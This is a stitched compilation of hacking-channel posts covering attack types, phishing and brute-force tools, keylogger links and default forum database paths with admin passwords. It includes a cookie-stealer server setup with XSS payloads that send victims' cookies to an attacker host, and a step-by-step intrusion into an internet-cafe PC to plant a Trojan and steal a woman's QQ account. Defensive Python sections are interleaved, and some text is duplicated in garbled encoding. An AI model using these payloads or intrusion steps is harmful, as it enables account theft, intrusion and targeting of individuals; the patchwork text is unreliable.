🦑 MOST ACTIVE ATTACKS 2020:
instagram.com/UndercodeTesting
1. Phishing
One of the most insidious techniques in use today is phishing. It's hard to find a person who doesn't know what phishing is, yet a lot of users are still tricked by hackers on a daily basis.
Phishing means replicating a website with the aim of stealing money or personal information. Once a user enters his credit card details, for example, the hacker has access to that data and can use it for his own benefit.
2. Viruses and malicious code
Hackers can get into almost any website and leave malware in its database or insert code into the website's files. There is a huge variety of viruses, and each may affect the infected site differently. But there should be no doubt that a virus, regardless of its type, will not benefit your business.
3. UI Redress
This technique is similar to phishing, but in this case the hacker creates a fake, hidden user interface. Once a user clicks a button intending to proceed to a certain page, he finds himself on an unfamiliar website, usually with inappropriate content.
4. Cookie Theft
With the help of malicious software, hackers can steal your browser's cookies. Those cookies contain a lot of important information: browsing history, usernames and passwords. That data can also include the logins and passwords to your website's administrator panel.
5. Denial of Service (DoS\DDoS)
DDoS stands for Distributed Denial of Service. A DDoS attack is a way to make a certain server unavailable or, in other words, a way to crash the server.
To interrupt or crash the server, a hacker uses bots. The bots' sole purpose is to send requests to the website, a lot of requests. As a result, a server unable to process all of the received requests will simply crash. The most hazardous thing about this technique is that a hacker can crash the server in a relatively small amount of time.
6. DNS spoofing
This technique is also known as DNS cache poisoning. It engages that old cache data you might have forgotten about.
Vulnerabilities in the domain name system allow hackers to redirect traffic from your website to a malicious one. Moreover, hackers can program this attack so that the infected DNS server will infect another DNS server, and so on.
7. SQL injection
If your website has vulnerabilities in its SQL database or libraries, hackers can get access to your confidential information by deceiving the system. So it is no surprise that SQL injection can also be a simple tool. But this simple tool can allow a hacker to access vital information of your website.
8. Keylogger injection
A keylogger is a very simple and dangerous piece of malicious code.
The malware records keystrokes, capturing all of the user's actions on the keyboard, and sends everything it has recorded to the hacker; it also installs a malicious script that runs an in-browser cryptocurrency miner.
If a hacker succeeds in obtaining the data, the result of the hack will be stolen admin credentials that allow hackers to easily log into your website.
9. Non-targeted website hack
In most cases, hackers don't target a specific website. They are more interested in massive hacking.
It is easy to suffer from a non-targeted attack: you just need to overlook any CMS, plugin or template vulnerability. Any gap is a chance to come into the hacker's sight and become a victim during the next attack.
Hackers can find websites with similar weaknesses easily. They can always use Google's Hacking Database to get a list of vulnerable websites that have the same properties. For example, hackers can find all indexed websites that have a vulnerable plugin installed, or websites with unhidden catalogues.
10. Brute force
A brute force attack is a simple method of gaining access to a website. It tries various combinations of passwords again and again until it gets in. This repetitive action is like an army attacking a fort.
🦑 Phishing tools most used by hackers in 2020
> on github
Infosec IQ
Gophish
LUCY
Simple Phishing Toolkit (sptoolkit)
Phishing Frenzy
King Phisher
SpeedPhish Framework (SPF)
Social-Engineer Toolkit (SET)
@UndercodeTesting
🦑 MOST USED BRUTE FORCE TOOLS 2020
t.me/UndercodeTesting
1) Ophcrack for Windows is an excellent option for brute forcing and cracking passwords.
http://ophcrack.sourceforge.net/
2) Brutus uses a technique called time-memory trade-off, which allows for large multi-threaded brute forcing attacks all at once.
http://www.hoobie.net/brutus/
3) Cain and Abel is not only a password cracker but an overall excellent network security tool.
http://www.oxid.it/
4) John the Ripper is compatible with Linux and Unix and is fully able to brute force Windows LM hashes, although John the Ripper is not directly suited to Windows. This software is extremely fast at brute force cracking Linux and Unix NTLM hashes.
http://www.openwall.com/john/
5) Medusa is a variation of the THC Hydra cracking software. Medusa has many advantages as a speedy, parallel and modular login brute forcing tool.
http://foofus.net/goons/jmk/medusa/medusa.html
🦑 Best 2020 keylogger apps
pinterest.com/undercode_Testing
1) http://www.spyrix.com/spyrix-free-keylogger.php
2) https://kidinspector.com/
3) http://www.actualkeylogger.com/
4) https://store.payproglobal.com/r?u=https://www.refog.com&a=4913
5) https://www.iwantsoft.com/
6) https://kidlogger.net/?lang=en
8) https://www.logixoft.com/en-us/index
9) https://www.ardamax.com/keylogger/ free
10) https://sourceforge.net/projects/basickeylogger/
🦑 PHP Cookie Stealing Scripts for use in XSS
t.me/undercodeTesting
🦑 Installation & run:
1) On the remote attacker machine, start the web server (Apache2 in this example):
sudo service apache2 start
2) Clone the repo locally, then push the chosen "Cookie stealer" PHP script from the local host to the attacking machine:
git clone https://github.com/RxSec/CookieHeist
3) cd CookieHeist
sudo scp cookiestealer-simple.php username@AttackMachine:/var/www/html/
4) sudo scp log.txt username@AttackMachine:/var/www/html/
🦑 AWS version:
scp -i AWS-Key.pem cookiesteal-simple.php ec2-user@ec2[YOUR IP].us-east-2.compute.amazonaws.com:~/.
sudo mv cookiestealer-simple.php /var/www/html/
Example: http://[Attacker Webserver]/cookiesteal-simple.php
🦑 Setting permissions:
Find out which user owns the httpd process with the following command:
ps aux | grep httpd
The output should be similar to this:
ec2-user 1569 0.0 0.1 12840 1064 pts/0 S+ 17:55 0:00 grep httpd
Now you know which user is trying to write files, in this case ec2-user. You can now set the permissions on the directory the PHP script writes to:
sudo chown ec2-user:ec2-user /var/www/html/
sudo chmod 755 /var/www/html/
XSS payload examples:
<script javascript:text>document.location="http://[Attacker Webserver]cookiesteal-simple.php?c=" + document.cookie + "&t=Alert"; </script>
<script>document.location='http://[Attacker Webserver]/cookiesteal-v.php?cookie=' + document.cookie</script>
<img src=x onerror=this.src='http://[Attacker Webserver]/cookiesteal-v.php?cookie='+document.cookie>
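Seen from the site being defended, the payloads above obtain only what `document.cookie` exposes, and a cookie set with `HttpOnly` is not part of it. The following is an added example (not from the original post or the CookieHeist repo): it parses constructed `Set-Cookie` values, shows which cookies an injected script could read, and flags session-like cookies that lack `HttpOnly`, `Secure` or `SameSite`. The cookie names and the "sensitive name" hints are assumptions.

```python
from http.cookies import SimpleCookie

# Constructed Set-Cookie header values (not captured from any real site).
SAMPLE_HEADERS = [
    "PHPSESSID=4f2a9c17; Path=/",
    "admin_auth=9b1e77d0; Path=/; Secure; HttpOnly; SameSite=Strict",
    "theme=dark; Path=/; SameSite=Lax",
]

# Assumption: substrings that mark a cookie as carrying a session or login.
SENSITIVE_HINTS = ("sess", "auth", "token", "login")


def parse_set_cookie(header_value):
    """Return (name, value, flags) for a single Set-Cookie header value."""
    jar = SimpleCookie()
    jar.load(header_value)
    if len(jar) != 1:
        raise ValueError(f"unparseable Set-Cookie value: {header_value!r}")
    name, morsel = next(iter(jar.items()))
    flags = {
        "httponly": bool(morsel["httponly"]),
        "secure": bool(morsel["secure"]),
        "samesite": morsel["samesite"] or None,
    }
    return name, morsel.value, flags


def script_visible(headers):
    """Cookie string a script in the page could read from document.cookie.

    Simplification: Path/Domain scoping and expiry are ignored.
    """
    pairs = []
    for header in headers:
        name, value, flags = parse_set_cookie(header)
        if not flags["httponly"]:
            pairs.append(f"{name}={value}")
    return "; ".join(pairs)


def audit(headers):
    """Return (cookie_name, problem) for session-like cookies with weak flags."""
    findings = []
    for header in headers:
        name, _value, flags = parse_set_cookie(header)
        if not any(hint in name.lower() for hint in SENSITIVE_HINTS):
            continue
        if not flags["httponly"]:
            findings.append((name, "missing HttpOnly: readable via document.cookie"))
        if not flags["secure"]:
            findings.append((name, "missing Secure: also sent over plain HTTP"))
        if flags["samesite"] is None:
            findings.append((name, "missing SameSite: sent on cross-site requests"))
    return findings


if __name__ == "__main__":
    print("Readable by an injected script:", script_visible(SAMPLE_HEADERS))
    for cookie, problem in audit(SAMPLE_HEADERS):
        print(f"{cookie}: {problem}")
```

In the sample, the `HttpOnly` cookie `admin_auth` never appears in the script-visible string, while `PHPSESSID` does.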
🦑 The default databases of various website programs:
t.me/UndercodeTesting
Dynamic network (Dongwang forum, dvbbs):
default database
/data/dvbbs7.mdb
backup database
/databackup/dvbbs7.mdb
foreground:
user name: admin
password: admin888
background:
user name: admin
password: admin888
_______________
BBSXP:
default database
/database/bbsxp.mdb
_______________
LeadBBS
default database
/Data/LeadBBS.mdb
username: Admin
password: admin
_______________
6kbbs
default database
/db/6k.asp
username: admin
password: 6kadmin
_______________
/data/dvbbs7.mdb - Dongwang forum database
  Foreground: username: admin password: admin888
  Background: username: admin password: admin888
/databackup/dvbbs7.mdb - Dongwang forum database
/bbs/databackup/dvbbs7.mdb - Dongwang forum database
/data/zm_marry.asp - ized database
/admin/data/qcdn_news.mdb - Chong Qing article management system database
/data/qcdn_news.mdb - Chong Qing article management system database
/firend.mdb - Dating Service database
/database/newcloud6.mdb - new cloud database management system 6.0
/database/%23newasp.mdb - new cloud website system
/database/powereasy4.mdb - Dongyi website management system 4.03 database
/blogdata/l-blog.mdb - l-blog v1.08 database
/database/bbsxp.mdb - bbsxp forum database
/bbs/database/bbsxp.mdb - bbsxp forum database
/access/sf2.mdb - snowman forum program v2.0 database
/data/leadbbs.mdb - leadbbs forum v3.14 database
  username: admin password: admin
/bbs/data/leadbbs.mdb - leadbbs forum v3.14 database
/bbs/access/sf2.mdb - snowman forum program v2.0 database
/blog/blogdata/l-blog.mdb - l-blog v1.08 database
/fdnews.asp - Liuhe dedicated bbs database
/bbs/fdnews.asp - Liuhe dedicated bbs database
/admin/ydxzdate.asa - raindrop download system v2.0 + sp1 database
/data/down.mdb - Download system xp v1.3 database
/database/database.mdb - Xuanxi download system v3.1 database
/db/xzjddown.mdb - lhdownxp download system database
/db/play.asp - Entertainment Pioneer Forum v3.0 database
/mdb.asp - Jingyun Download system v1.2 database
/admin/data/user.asp - shock cloud download system v3.0 database
/data_jk/joekoe_data.asp - Joe off 6.0 database
/data/news3000.asp - boiling outlook news system v1.1 database
/data/appoen.mdb - Huixin News System 4.0 Database
/data/12912.asp - Flying Dragon Article Management System v2.1 Database
/database.asp - Dynamic Needs Download Management System v3.5
/download.mdb - Aberdeen Software Download Management System v2.3
/dxxobbs/mdb/dxxobbs.mdb - dxxobbs Forum Database
/db/6k.asp - 6kbbs
  Username: admin Password: 6kadmin
/database/snowboy.mdb - Snow boy forum; default background: admin/admin_index.asp
/database/#mmdata.mdb - Yishuang community
/starark.asp - poor dragon asp website generation system
written by Under code
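For a site owner, the list above comes down to one check: is an Access database sitting inside the web root, under its own extension or renamed to `.asp`/`.asa` as several entries are? The following is an added example (not from the original post) that walks a web root and identifies Access files by their header rather than by name; the demo tree and its file names are constructed.

```python
import os
import tempfile

# Access files carry one of these markers right after the first 4 header bytes.
ACCESS_MARKERS = {
    b"Standard Jet DB": "Access/Jet (.mdb format)",
    b"Standard ACE DB": "Access/ACE (.accdb format)",
}
DB_EXTENSIONS = {".mdb", ".accdb"}


def access_format(path):
    """Return the Access format name if the file header matches, else None."""
    try:
        with open(path, "rb") as fh:
            header = fh.read(4 + 15)
    except OSError:
        return None  # unreadable file: nothing to report
    for marker, label in ACCESS_MARKERS.items():
        if header[4:4 + len(marker)] == marker:
            return label
    return None


def scan_web_root(root):
    """Return sorted (site_path, format, note) for every database under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for filename in files:
            full = os.path.join(dirpath, filename)
            fmt = access_format(full)
            if fmt is None:
                continue
            ext = os.path.splitext(filename)[1].lower()
            if ext in DB_EXTENSIONS:
                note = "database stored in the web root under its own extension"
            else:
                note = f"database renamed to {ext or '(no extension)'}"
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            findings.append(("/" + rel, fmt, note))
    return sorted(findings)


def build_demo_root(base):
    """Create a small constructed site tree (hypothetical file names)."""
    jet = b"\x00\x01\x00\x00Standard Jet DB\x00" + b"\x00" * 64
    layout = {
        "data/forum.mdb": jet,                       # plain .mdb in the web root
        "db/board.asp": jet,                         # database behind .asp
        "index.asp": b'<% Response.Write("hi") %>',  # ordinary script, ignored
    }
    for rel, content in layout.items():
        full = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return base


def demo():
    """Scan the constructed tree and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_web_root(build_demo_root(tmp))


if __name__ == "__main__":
    for site_path, fmt, note in demo():
        print(f"{site_path}: {fmt}: {note}")
```

To check a real site, call `scan_web_root()` with the directory the web server serves; any hit is a database that belongs outside that directory.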
🦑 Port 3389 in detail - why is it used for hacking?
youtube.com/undercode
3389 originally refers to port 3389 of the computer. It is generally used to refer to the remote desktop, and the port can be changed. It is not a Trojan horse program, but if it is not needed, the hacker base recommends shutting down the service.
🦑 Because it is the default port of the Windows Remote Desktop [can be modified]
3389 is generally used to refer to the remote desktop.
Microsoft's Remote Desktop is provided so that computer administrators can conveniently manage their own computers remotely.
But 3389 will provide that service to anyone who has an administrative password.
Most hackers like to open 3389 on a "chicken",
because 3389 is a normal system service and is also very convenient to use.
It can achieve the same effect as remote control software such as Grey Pigeon; the main thing is that it is a normal service.
Port 3389 is easy to find with various scanning tools (such as superscan, x-scan, etc.). Because some computer users lack security awareness, they often leave the password of the administrator account or of a new account blank, so rookies can use mstsc.exe to log in to other people's computers in GUI mode. To prevent others from using 3389 to log in to the computer, it is best to set a password for each account or close the port with a firewall. Closing 3389 is recommended.
🦑 To close port 3389:
First, port 3389 is the port opened by the Windows remote management terminal. It is not a Trojan horse program. First determine whether you opened the service yourself. If it is not necessary, it is recommended to close the service.
win8 server: Start -> Programs -> Administrative Tools -> Services, find the Terminal Services item, open its Properties, change the startup type to Manual, and stop the service.
win8: Start -> Settings -> Control Panel -> Administrative Tools -> Services, find the Terminal Services item, open its Properties, change the startup type to Manual, and stop the service.
🦑 How to close it in Windows: right-click My Computer, select Properties -> Remote, and clear the two checkboxes for Remote Assistance and Remote Desktop.
Close port 3389 through the registry:
Start -> Run
Enter regedit to open the registry.
In the [HKEY_LOCAL_MACHINE\System\control\Terminal Server\wds\rdpwd\tds\tcp] branch, select the value named PortNumber and change it from 3389 to another value (such as 1234). Watch how I do it. There are two control sets, controlSET001 and controlSET002; change controlSET001 first, then controlSET002.
Next, look at currentcontrolset:
The [HKEY_LOCAL_MACHINE\System\currentcontrolset\control\Terminal Server\winstations\RDP-Tcp\PortNumber] branch should have one or more similar subkeys; in the same way, change the value 3389 to another value (such as 1234).
written by undercode
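Changing `PortNumber` moves the Remote Desktop listener to another port; it does not stop the service from accepting connections. The following is an added example (not from the original post) that reads the `RDP-Tcp` key named above and reports whether connections are accepted, on which port, and whether Network Level Authentication is required. The value names `fDenyTSConnections` and `UserAuthentication` are standard Windows registry values that the post does not mention, and the sample settings are constructed.

```python
import sys

TS_KEY = r"SYSTEM\CurrentControlSet\Control\Terminal Server"
RDP_TCP_KEY = TS_KEY + r"\WinStations\RDP-Tcp"

# Constructed sample: RDP left enabled, port changed to 1234 as in the post.
SAMPLE_SETTINGS = {
    "fDenyTSConnections": 0,   # 0 = connections accepted, 1 = denied
    "PortNumber": 1234,
    "UserAuthentication": 0,   # 1 = Network Level Authentication required
}


def read_rdp_settings():
    """Read the live values from HKEY_LOCAL_MACHINE (Windows only)."""
    import winreg  # imported here so the module still loads on other systems

    def value(subkey, name):
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
            return winreg.QueryValueEx(key, name)[0]

    return {
        "fDenyTSConnections": value(TS_KEY, "fDenyTSConnections"),
        "PortNumber": value(RDP_TCP_KEY, "PortNumber"),
        "UserAuthentication": value(RDP_TCP_KEY, "UserAuthentication"),
    }


def assess(settings):
    """Return (status, findings) for a dict holding the three registry values."""
    port = settings["PortNumber"]
    if settings["fDenyTSConnections"] != 0:
        return "denied", [
            f"Remote Desktop connections are denied (configured port: {port})"
        ]
    findings = [f"Remote Desktop accepts connections on TCP {port}"]
    if port != 3389:
        findings.append(
            "port was changed from 3389: the service is moved, not closed, "
            "and a port scan still finds it"
        )
    if settings["UserAuthentication"] != 1:
        findings.append("Network Level Authentication is not required")
    return "open", findings


if __name__ == "__main__":
    # Use the real registry on Windows, the constructed sample elsewhere.
    current = read_rdp_settings() if sys.platform == "win32" else SAMPLE_SETTINGS
    status, notes = assess(current)
    print(f"RDP status: {status}")
    for note in notes:
        print(f" - {note}")
```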
🦑 Commands and techniques used for Internet cafe intrusion
Pinterest.com/undercode_Testing
There are many Internet cafe management programs, but most of them have one loophole or another, so there are many techniques for cracking Internet cafe software: you can surf the Internet for free, you can use the "command prompt" method, you can use administrator permissions, and so on. As a result, Internet cafes have become the places where the loss of virtual property is most severe. But as long as the Internet cafe administrator is skilled enough, this situation can be avoided. Let me tell you how I used to get an MM's QQ number in Internet cafes. It is a little complicated. The hacker base is mainly to let you know some commands used during hacking.
🦑 Let's start:
Step 1: First determine the IP of the computer used by the MM. The number and the IP address of a computer in an Internet cafe are usually the same or higher. For example, the computer numbered 20 in the Internet cafe is generally 192.168.0.20 or 192.168.0.21 (192.168.0.1 is left to the router). Not only that, the machine names are also regular: the machine name of computer 20 is usually Wangba20. So as long as you know which computer the MM is using, you can enter the "command prompt" and Ping Wangba20 to get the IP address, such as 192.168.0.20.
Step 2: With the IP, you can start to connect to the MM computer. Because the computers in the Internet cafe mostly use Windows 2000 that has not been patched, and the user name for logging in to the computer is mostly in the form "user number" with an empty password, at the "command prompt" enter net use //192.168.0.20/ipc$ "" / user: "" and net use //192.168.0.20/ipc$ "" / user: "user20" to establish a connection.
After the connection is successful, you must close the anti-virus software on the other computer: right-click "My Computer", select "Manage", right-click "Computer Management (Local)" in the window that opens, select "Connect to another computer", connect to 192.168.0.20, and start the "Telnet" service ("Computer Management" can directly manage remote computers).
Step 3: Enter two commands at the "Command Prompt" to create a new user20 user on this machine and add it to the administrators group.
net user user20 / add
net localgroup administrators user20 / add
Step 4: Go to C:\Winnt\System32, right-click CMD.EXE, select "Create Shortcut", then right-click the newly created shortcut, select "Properties", and check "Run as other user" (to run the program as another user). Run the CMD shortcut; when the "Run as another user" window pops up, enter "user20" and press Enter.
Step 5: Log in to the MM computer with telnet 192.168.0.20, then download a command-line process-killing tool from the Internet, such as knlps, and close the anti-virus software process over telnet.
Step 6: You can download a Trojan now and use the "copy Trojan name.exe //192.168.0.20/admin$" method to copy the Trojan to the MM computer. Then use net time //192.168.0.20 to get the time of the MM computer, for example 4 pm, and finally use "at //192.168.0.20 time Trojan name.exe", such as the command "at //192.168.0.20 16:02 Trojan name.exe", which runs the Trojan at the specified time.
🦑 With a Trojan, you can naturally know the QQ number used by the MM.
How about it, is it dangerous in Internet cafes? However, you can rest assured that not all Internet cafes are like this. Most Internet cafes are still very safe. When you use QQ or other software, you can select "Internet cafe mode" (the "Login Mode" option appears after clicking "Advanced Settings").
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Commands and techniques used for Internet cafe intrusion
Pinterest.com/undercode_Testing
>There are many Internet cafe management software, but most of them have one or another loophole, so there are many techniques for cracking Internet cafe software and Internet cafe software,
>you can surf the Internet for free, you can use the "command prompt" method, you can use administrator permissions, and so on. As a result, Internet cafes have become the most severe places for loss of virtual property. But as long as the level of the Internet cafe administrator is sufficient, this situation can be avoided. Let me tell you how I used to get the MMQQ number in Internet cafes. It is a little complicated. The hacker base is mainly to let you know some commands used during hacking.
π¦ππΌπ'π πππΈβπ :
The first step: first determine the IP of the computer used by the MM. The number and IP address of the computer in the Internet cafe are usually the same or higher. For example, the computer with the number 20 in the Internet cafe is generally 192.168.0.20 or 192.168.0.21 (192.168 .0.1 is left to the router), not only that, the machine name is also regular, the machine name of computer 20 is usually Wangba20, so as long as you know the computer used by MM, and then enter the "command prompt", Ping Wangba20 can get the IP address , Such as 192.168.0.20.
Step 2: With the IP, you can start to connect to the MM computer. Because the computers in the Internet cafe mostly use Windows 2000 that has not been patched, and the user name for logging in to the computer is mostly of the form "user number" with an empty password, at the "command prompt" enter net use //192.168.0.20/ipc$ "" / user: "" and net use //192.168.0.20/ipc$ "" / user: "user20" to establish a connection.
After the connection is successful, you must close the anti-virus software on the other computer: right-click "My Computer", select "Management", right-click "Computer Management (Local)" in the pop-up window, select "Connect to another computer", connect to 192.168.0.20, and start the "Telnet" service ("Computer Management" can directly manage remote computers).
Step 3: Enter two commands at the "command prompt" to create a new user20 user on this machine and add it to the administrators group.
net user user20 / add
net localgroup administrators user20 / add
Step 4: Go to C:\Winnt\System32, right-click CMD.EXE, select "Create Shortcut", then right-click the newly created shortcut, select "Properties", and check "Run as other user" (to run the program as another user). Run the CMD shortcut and, after the "Run as another user" window pops up, enter "user20" and press Enter.
Step 5: Log in to the MM computer with telnet 192.168.0.20, then download a command-line process-killing tool from the Internet, such as knlps, and close the anti-virus software process over telnet.
Step 6: You can download a Trojan now, and use the "copy Trojan name.exe //192.168.0.20/admin$" method to copy the Trojan to the MM computer. Then use net time //192.168.0.20 to get the time of the MM computer, for example 4 pm, and finally use "at //192.168.0.20 time Trojan name.exe", such as "at //192.168.0.20 16:02 Trojan name.exe"; this command runs the Trojan at the specified time.
With a Trojan, you can naturally know the QQ number used by the MM.
How about it, is it dangerous in Internet cafes? However, you can rest assured that not all Internet cafes are like this. Most Internet cafes are still very safe. Whenever you use QQ or other software, you can select "Internet cafe mode" (click "Advanced Settings" and the "Login Mode" option appears).
written by undercode
Basic knowledge of data record recovery
t.me/UndercodeTesting
Let's start with the data structure of the hard disk.
Hard disk data structure
A newly bought hard disk cannot be used right away. You need to partition and format it, and then install the operating system before you can use it. Taking the Win9x/Me series that we have been using until now as an example, we generally divide the hard disk into five parts: the master boot sector, the operating system boot sector, FAT, DIR and Data (of these, there is only one master boot sector; the others increase with the number of your partitions).
Master boot sector
The master boot sector is located at cylinder 0, head 0, sector 1 of the entire hard disk, and includes the hard disk's Master Boot Record (MBR) and the Disk Partition Table (DPT). The role of the master boot record is to check whether the partition table is correct, determine which partition is the boot partition, and, at the end of the program, load the startup program of that partition (that is, the operating system boot sector) into memory for execution. As for the partition table, as many people know, it starts with 80H or 00H and ends with 55AAH, is 64 bytes in total, and is located at the very end of the sector. It is worth mentioning that the MBR is generated by a partitioning program (such as Fdisk.exe for DOS), and this sector may be different for different operating systems. If you are so inclined, you can write one yourself, as long as it can complete the aforementioned tasks, which is why multi-system startup can be achieved (and why there are a lot of boot sector viruses).
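As an added illustration (not part of the original post), this Python sketch checks a 512-byte master boot sector the way a recovery or forensics tool would: it reads the four 16-byte entries of the 64-byte partition table, the 80H/00H boot flag and the 55AAH end marker. The offsets (table at byte 446, marker at byte 510) are the standard MBR layout; the function names and the two sample sectors are constructed for this example.

```python
import struct

SECTOR_SIZE, TABLE_OFFSET, ENTRY_SIZE = 512, 446, 16  # table = last 64 bytes before marker
ENTRY_FMT = "<B3xB3xII"   # boot flag, CHS start (skipped), type, CHS end (skipped), LBA start, sector count
END_MARKER = b"\x55\xaa"  # the "55AAH" at bytes 510-511

def parse_mbr(sector):
    """Return (entries, problems) for one 512-byte master boot sector."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected exactly 512 bytes")
    problems = []
    if sector[510:512] != END_MARKER:
        problems.append("missing 55AAH end marker")
    entries = []
    for i in range(4):
        flag, ptype, start, count = struct.unpack_from(ENTRY_FMT, sector, TABLE_OFFSET + i * ENTRY_SIZE)
        if ptype == 0 and count == 0:
            continue  # unused slot
        if flag not in (0x00, 0x80):
            problems.append(f"entry {i}: boot flag {flag:02X}H is neither 80H nor 00H")
        entries.append({"index": i, "active": flag == 0x80, "type": ptype,
                        "lba_start": start, "sectors": count})
    if sum(e["active"] for e in entries) > 1:
        problems.append("more than one active (80H) partition")
    # Partitions must not overlap on disk; any overlap shows up between neighbours in start order.
    spans = sorted((e["lba_start"], e["lba_start"] + e["sectors"], e["index"]) for e in entries)
    for (_, end_a, a), (start_b, _, b) in zip(spans, spans[1:]):
        if start_b < end_a:
            problems.append(f"entries {a} and {b} overlap")
    return entries, problems

def build_sector(table, marker=END_MARKER):
    """Constructed sample: zeroed boot code plus (flag, type, start, count) rows."""
    sector = bytearray(SECTOR_SIZE)
    for i, row in enumerate(table):
        struct.pack_into(ENTRY_FMT, sector, TABLE_OFFSET + i * ENTRY_SIZE, *row)
    sector[510:512] = marker
    return bytes(sector)

# Constructed samples, not taken from a real disk.
GOOD = build_sector([(0x80, 0x0B, 63, 1_000_000), (0x00, 0x05, 1_000_063, 2_000_000)])
DAMAGED = build_sector([(0x80, 0x0B, 63, 1_000_000), (0x81, 0x06, 500_000, 1_000)],
                       marker=b"\x00\x00")

if __name__ == "__main__":
    for name, sector in (("GOOD", GOOD), ("DAMAGED", DAMAGED)):
        entries, problems = parse_mbr(sector)
        print(name, [hex(e["type"]) for e in entries], problems or "table looks consistent")
```

A table that fails these checks is a sign that the sector was overwritten or damaged and should be rebuilt from a backup copy rather than trusted.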
Operating system boot sector
The OBR (OS Boot Record) is the boot sector of the operating system, usually located at cylinder 0, head 1, sector 1 of the hard disk (this is for DOS; for systems that boot in multi-boot mode it is located in the first sector of the corresponding primary partition / extended partition). It is the first sector that the operating system can directly access. It also includes a boot program and a partition parameter record table called the BPB (BIOS Parameter Block). In fact, each logical partition has an OBR, and its parameters vary depending on the size of the partition and the type of operating system. The main task of the boot program is to determine whether the first two files in the root directory of the partition are the boot files of the operating system (such as IO.SYS and MSDOS.SYS for MS-DOS, or for Win9x/Me, which originates from MS-DOS). If so, the first file is read into memory and control is given to that file. The BPB parameter block records important parameters such as the start sector, end sector, file storage format, hard disk media descriptor, root directory size, number of FATs, and size of the allocation unit (also known as a cluster) in the partition. The OBR is generated by a high-level formatting program (e.g. Format.com for DOS).
File allocation table
The FAT (File Allocation Table) is the file allocation table of the DOS/Win9x systems. For data security, two FATs are generally kept: the second FAT is a backup of the first. The FAT area is immediately after the OBR, and its size is determined by the size of the partition and the size of the file allocation unit. There are many choices about the format of the FAT. Microsoft's DOS and Windows use the familiar FAT12, FAT16 and FAT32 formats, but there is no other format of FAT other than these; systems like Windows NT, OS/2, UNIX/Linux, Novell, etc. have their own file management methods.